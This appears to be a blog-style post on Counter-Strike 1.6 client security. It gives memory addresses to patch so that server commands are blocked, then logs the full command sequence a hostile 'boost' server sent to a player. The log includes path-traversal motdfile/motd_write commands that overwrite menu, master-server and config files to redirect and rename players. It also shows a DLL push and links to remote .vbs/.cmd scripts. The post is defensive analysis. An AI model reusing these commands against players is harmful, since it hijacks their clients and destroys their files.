cs16 musings
warning: may contain random nonsense ramblingsAll mentions here involves official steam CS1.6 version;
Protocol version 48 Exe version 1.1.2.7/Stdio (cstrike) Exe build: 19:53:27 Aug 3 2020 (8684)
looking at the 'acceptable' commands from server to client seems ridiculous even with valve's cmdfilter in place.
the client can still get slowhacked with some stuff such as name change, possibly more dangerous things with exploits.
connecting to some shady servers reveals how ridiculous they're attempting to exploit clients.
poking around, it seems you can block practically all cmds coming from the server, by forcing them to be considered invalid.
here if you NOP at adress 0x0384E1B4, shown here;
further, privileged cmds here, NOP at address 0x03858553 here;
from there you can also help block non-standard file transfers & possible exploits by, again, NOPing at address 0x03896796 here;
In another thoughts, even though I'm using the official updated game client from steam. There still seems to be newer methods, mystery to me, to start file transfers, links to windows script files that are passing to the client, even during in-game. The ability to also activate dialog boxes, without using standard client commands. :huh:
Links get processed by the client
http://csboost.net/update/static.vbs http://csboost.net/update/run.cmd http://csboost.net/update/config.cfg
I have no idea if the client actually executes them or not, but I find it strange that they get parsed in the first place.
Anyways...
While now with the modifications applied as mentioned above, it also prevents the server from using the CLEAR cmd on the client, so we get to see the full set of commands that they try to hide, shown below.
Connecting to 217.182.69.129:27007...
Connection accepted by 217.182.69.129:27007
Server tried to send invalid command:"cl_filterstuffcmd 0
"
Server tried to send invalid command:"developer 0
"
Server tried to send invalid command:"cl_allowdownload 1
"
Server tried to send invalid command:"wait;wait;wait;wait;wait;"motdfile" "!MD5/../../cstrike/resource/GameMenu.res"
"
Server tried to send invalid command:"wait;wait;wait;wait;wait;"motd_write" "GameMenu" { "1" { "label" "Play Random Server" "command" "engine CONNECT boost.super-boost.ro:27015" } "4" { "label" "" "command" "" } "5" { "label" "#GameUI_GameMenu_ResumeGame" "command" "ResumeGame" "OnlyInGame" "1" } "6" { "label" "#GameUI_GameMenu_Disconnect" "command" "Disconnect" "OnlyInGame" "1" "notsingle" "1" } "7" { "label" "#GameUI_GameMenu_FindServers" "command" "OpenServerBrowser" } "8" { "label" "#GameUI_GameMenu_Options" "command" "OpenOptionsDialog" } "9" { "label" "#GameUI_GameMenu_Quit" "command" "Quit" } }
"
Server tried to send invalid command:"wait;wait;wait;wait;wait;"motdfile" "motd.txt"
"
Server tried to send invalid command:"wait;wait;wait;wait;wait;"motdfile" "!MD5/../../config/MasterServers.vdf"
"
Server tried to send invalid command:"wait;wait;wait;wait;wait;"motd_write" "MasterServers"\n{\n "hl1"\n {\n "0"\n {\n "addr" "ms.super-boost.ro:27010"\n }\n "1"\n {\n "addr" "ms.super-boost.ro:27011"\n }\n "2"\n {\n "addr" "ms2.masterserver.ro:27010"\n }\n "3"\n {\n "addr" "ms.masterserver.ro:27010"\n "4"\n {\n "addr" "ms.superb-cs.ro:27010"\n }\n }\n}
"
Server tried to send invalid command:""motdfile" "!MD5/../../config/MasterServers2.vdf"
"
Server tried to send invalid command:""motd_write" "MasterServers"\n{\n "hl1"\n {\n "0"\n {\n "addr" "ms.super-boost.ro:27010"\n }\n "1"\n {\n "addr" "ms.super-boost.ro:27011"\n }\n "2"\n {\n "addr" "ms2.masterserver.ro:27010"\n }\n "3"\n {\n "addr" "ms.masterserver.ro:27010"\n "4"\n {\n "addr" "ms.superb-cs.ro:27010"\n }\n }\n}
"
Server tried to send invalid command:"wait;wait;wait;wait;wait;"motdfile" "!MD5/../../config/rev_MasterServers.vdf"
"
Server tried to send invalid command:"wait;wait;wait;wait;wait;"motd_write" "MasterServers"\n{\n "hl1"\n {\n "0"\n {\n "addr" "ms.super-boost.ro:27010"\n }\n "1"\n {\n "addr" "ms.super-boost.ro:27011"\n }\n "2"\n {\n "addr" "ms2.masterserver.ro:27010"\n }\n "3"\n {\n "addr" "ms.masterserver.ro:27010"\n "4"\n {\n "addr" "ms.superb-cs.ro:27010"\n }\n }\n}
"
Server tried to send invalid command:"wait;wait;wait;wait;wait;"motdfile" "!MD5/../../platform/config/MasterServers.vdf"
"
Server tried to send invalid command:"wait;wait;wait;wait;wait;"motd_write" "MasterServers"\n{\n "hl1"\n {\n "0"\n {\n "addr" "ms.super-boost.ro:27010"\n }\n "1"\n {\n "addr" "ms.super-boost.ro:27011"\n }\n "2"\n {\n "addr" "ms2.masterserver.ro:27010"\n }\n "3"\n {\n "addr" "ms.masterserver.ro:27010"\n "4"\n {\n "addr" "ms.superb-cs.ro:27010"\n }\n }\n}
"
Server tried to send invalid command:""motdfile" "!MD5/../../platform/config/MasterServers2.vdf"
"
Server tried to send invalid command:""motd_write" "MasterServers"\n{\n "hl1"\n {\n "0"\n {\n "addr" "ms.super-boost.ro:27010"\n }\n "1"\n {\n "addr" "ms.super-boost.ro:27011"\n }\n "2"\n {\n "addr" "ms2.masterserver.ro:27010"\n }\n "3"\n {\n "addr" "ms.masterserver.ro:27010"\n "4"\n {\n "addr" "ms.superb-cs.ro:27010"\n }\n }\n}
"
Server tried to send invalid command:"wait;wait;wait;wait;wait;"motdfile" "!MD5/../../platform/config/rev_MasterServers.vdf"
"
Server tried to send invalid command:"wait;wait;wait;wait;wait;"motd_write" "MasterServers"\n{\n "hl1"\n {\n "0"\n {\n "addr" "ms.super-boost.ro:27010"\n }\n "1"\n {\n "addr" "ms.super-boost.ro:27011"\n }\n "2"\n {\n "addr" "ms2.masterserver.ro:27010"\n }\n "3"\n {\n "addr" "ms.masterserver.ro:27010"\n "4"\n {\n "addr" "ms.superb-cs.ro:27010"\n }\n }\n}
"
Server tried to send invalid command:"wait;wait;wait;wait;wait;"motdfile" "!MD5/../../cstrike/cache/DownloadCache.db"
"
Server tried to send invalid command:"wait;wait;wait;wait;wait;"motd_write"Destroyed
"
Server tried to send invalid command:"wait;wait;wait;wait;wait;"motdfile" "!MD5/../../cstrike/hw/geforce.CFG"
"
Server tried to send invalid command:"wait;wait;wait;wait;wait;"motd_write" "connect" rep.super-boost.ro:27015
"
Server tried to send invalid command:"wait;wait;wait;wait;wait;"motdfile" "!MD5/../../cstrike/hw/opengl.CFG"
"
Server tried to send invalid command:"wait;wait;wait;wait;wait;"motd_write" "connect" rep.super-boost.ro:27015
"
Server tried to send invalid command:"wait;wait;wait;wait;wait;"motdfile" "!MD5/../../cstrike/valve.RC"
"
Server tried to send invalid command:"wait;wait;wait;wait;wait;"motd_write" "connect" rep.super-boost.ro:27015
"
Server tried to send invalid command:"wait;wait;wait;wait;wait;"motdfile" "!MD5/../../valve/hw/geforce.CFG"
"
Server tried to send invalid command:"wait;wait;wait;wait;wait;"motd_write" "connect" rep.super-boost.ro:27015
"
Server tried to send invalid command:"wait;wait;wait;wait;wait;"motdfile" "!MD5/../../valve/hw/opengl.CFG"
"
Server tried to send invalid command:"wait;wait;wait;wait;wait;"motd_write" "connect" rep.super-boost.ro:27015
"
Server tried to send invalid command:"wait;wait;wait;wait;wait;"motdfile" "!MD5/../../valve/valve.RC"
"
Server tried to send invalid command:"wait;wait;wait;wait;wait;"motd_write" "connect" rep.super-boost.ro:27015
"
Server tried to send invalid command:""motdfile" "!MD5/../../valve/banned.CFG"
"
Server tried to send invalid command:""motd_write" "connect" rep.super-boost.ro:27015
"
Server tried to send invalid command:""motdfile" "banned.CFG"
"
Server tried to send invalid command:""motd_write" "connect" rep.super-boost.ro:27015
"
Server tried to send invalid command:""motdfile" "default.CFG"
"
Server tried to send invalid command:""motd_write" "connect" rep.super-boost.ro:27015
"
Server tried to send invalid command:"wait;wait;wait;wait;wait;"motdfile" "autoexec.CFG"
"
Server tried to send invalid command:"wait;wait;wait;wait;wait;"motd_write" "connect" rep.super-boost.ro:27015
"
Server tried to send invalid command:""motdfile" "joystick.CFG"
"
Server tried to send invalid command:""motd_write" "connect" rep.super-boost.ro:27015
"
Server tried to send invalid command:""motdfile" "menucs16.CFG"
"
Server tried to send invalid command:""motd_write" "connect" rep.super-boost.ro:27015
"
Server tried to send invalid command:""motdfile" "listenserver.CFG"
"
Server tried to send invalid command:""motd_write" "connect" rep.super-boost.ro:27015
"
Server tried to send invalid command:""motdfile" "language.CFG"
"
Server tried to send invalid command:""motd_write" "connect" rep.super-boost.ro:27015
"
Server tried to send invalid command:""motdfile" "violence.CFG"
"
Server tried to send invalid command:""motd_write" "connect" rep.super-boost.ro:27015
"
Server tried to send invalid command:"wait;wait;wait;wait;wait;"motdfile" "userconfig.CFG"
"
Server tried to send invalid command:"wait;wait;wait;wait;wait;"motd_write"name [SupeR-BoosT]-Play3r
"
Server tried to send invalid command:""motdfile" "dcstrike16.CFG"
"
Server tried to send invalid command:""motd_write" "connect" rep.super-boost.ro:27015
"
Server tried to send invalid command:"wait;wait;wait;wait;wait;"motdfile" "autoconfig.CFG"
"
Server tried to send invalid command:"wait;wait;wait;wait;wait;"motd_write" "connect" rep.super-boost.ro:27015
"
Server tried to send invalid command:""motdfile" "cstrike16.CFG"
"
Server tried to send invalid command:""motd_write" "connect" rep.super-boost.ro:27015
"
Server tried to send invalid command:""motdfile" "setti.CFG"
"
Server tried to send invalid command:""motd_write" "connect" rep.super-boost.ro:27015
"
Server tried to send invalid command:"clear
"
Could not execute privileged command clear
Could not execute privileged command clear
(U+0002)
BUILD 1812 SERVER (0 CRC)
Server # 812
Server tried to send invalid command:"fullserverinfo "\*gamedir\cstrike"
"
* Privileges set
File fragment received but cl_allow_download set to 0, ignoring
File fragment received but cl_allow_download set to 0, ignoring
File fragment received but cl_allow_download set to 0, ignoring
File fragment received but cl_allow_download set to 0, ignoring
File fragment received but cl_allow_download set to 0, ignoring
File fragment received but cl_allow_download set to 0, ignoring
Server tried to send invalid command:""DLfiLe bin3/cl_dlls/gameui.DLL"
"
File fragment received but cl_allow_download set to 0, ignoring
Error: server failed to transmit file 'bin3/cl_dlls/gameui.DLL'
File fragment received but cl_allow_download set to 0, ignoring
Server tried to send invalid command:"TIMEDEMo maps/de_plm.bsp
"
Could not execute privileged command TIMEDEMo maps/de_plm.bsp
File fragment received but cl_allow_download set to 0, ignoring
File fragment received but cl_allow_download set to 0, ignoring
File fragment received but cl_allow_download set to 0, ignoring
File fragment received but cl_allow_download set to 0, ignoring
Connecting to 217.182.69.129:27015...
Connection accepted by 217.182.69.129:27015
(U+0002)
BUILD 1812 SERVER (0 CRC)
Server # 3
Server tried to send invalid command:"fullserverinfo "\*gamedir\cstrike"
"
Server tried to send invalid command:"name "Sup3R-Boost| Play3R"
"
Server tried to send invalid command:"wait;wait;wait;wait;wait;"connect" 217.182.69.129:27015
"